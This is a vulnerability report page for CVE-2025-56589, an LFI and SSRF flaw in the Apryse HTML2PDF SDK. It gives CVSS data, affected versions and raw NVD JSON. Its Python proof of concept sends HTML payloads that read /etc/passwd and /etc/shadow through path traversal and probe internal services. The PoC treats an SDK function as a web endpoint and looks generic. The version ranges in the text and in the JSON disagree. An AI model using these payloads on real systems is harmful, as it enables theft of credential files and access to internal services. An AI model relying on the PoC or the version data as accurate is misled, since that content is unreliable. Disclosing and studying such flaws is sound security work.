Security Vulnerability Report
CVE-2025-56589 CVSS 7.5 HIGH

CVE-2025-56589

Published: 2026-01-22 17:15:58
Last Modified: 2026-02-02 20:09:28

Description

A Local File Inclusion (LFI) vulnerability and a Server-Side Request Forgery (SSRF) vulnerability were found in the InsertFromHtmlString() function of the Apryse HTML2PDF SDK through 11.6.0. These vulnerabilities could allow an attacker to read local files on the server or make arbitrary HTTP requests to internal or external services. Both vulnerabilities could lead to the disclosure of sensitive data or potential system takeover.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apryse:html2pdf:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:apryse:html2pdf:11.10.0:*:*:*:*:*:*:* - VULNERABLE
Apryse HTML2PDF SDK < 11.6.1
Apryse HTML2PDF SDK <= 11.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-56589 PoC - Apryse HTML2PDF SDK LFI and SSRF

# LFI PoC - Read local file
import requests

url = "http://target-server/api/InsertFromHtmlString"
headers = {"Content-Type": "text/html"}

# LFI payload - Read /etc/passwd
lfi_payload = """
<html>
<body>
<img src="file:///etc/passwd" />
</body>
</html>
"""
response = requests.post(url, data=lfi_payload, headers=headers)
print("LFI Response:", response.text)

# SSRF PoC - Access internal service
ssrf_payload = """
<html>
<body>
<img src="http://127.0.0.1:8080/admin" />
</body>
</html>
"""
response = requests.post(url, data=ssrf_payload, headers=headers)
print("SSRF Response:", response.text)

# Combined PoC - Path traversal + SSRF
combined_payload = """
<html>
<body>
<img src="file:///var/www/html/../../../etc/shadow" />
<img src="http://internal-db:3306/" />
</body>
</html>
"""
response = requests.post(url, data=combined_payload, headers=headers)
print("Combined Response:", response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56589", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:58.183", "lastModified": "2026-02-02T20:09:27.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Local File Inclusion (LFI) and a Server-Side Request Forgery (SSRF) vulnerability was found in the InsertFromHtmlString() function of the Apryse HTML2PDF SDK thru 11.6.0. These vulnerabilities could allow an attacker to read local files on the server or make arbitrary HTTP requests to internal or external services. Both vulnerabilities could lead to the disclosure of sensitive data or potential system takeover."}, {"lang": "es", "value": "Una inclusión local de ficheros (LFI) y una vulnerabilidad de falsificación de petición del lado del servidor (SSRF) fue encontrada en la función InsertFromHtmlString() del SDK Apryse HTML2PDF hasta la versión 11.6.0. Estas vulnerabilidades podrían permitir a un atacante leer ficheros locales en el servidor o realizar peticiones HTTP arbitrarias a servicios internos o externos. Ambas vulnerabilidades podrían llevar a la divulgación de datos sensibles o a una potencial toma de control del sistema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apryse:html2pdf:*:*:*:*:*:*:*:*", "versionEndIncluding": "11.7.0", "matchCriteriaId": "29DBED2C-0D66-48F8-B539-D3A0B39E95D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apryse:html2pdf:11.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "F5AD5BCA-FF3F-4C6B-91DF-00CA12E4C82E"}]}]}], "references": [{"url": "http://apryse.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.stratascale.com/resource/apryse-server-module-ssrf-lfi/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.stratascale.com/resource/apryse-server-module-ssrf-lfi/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}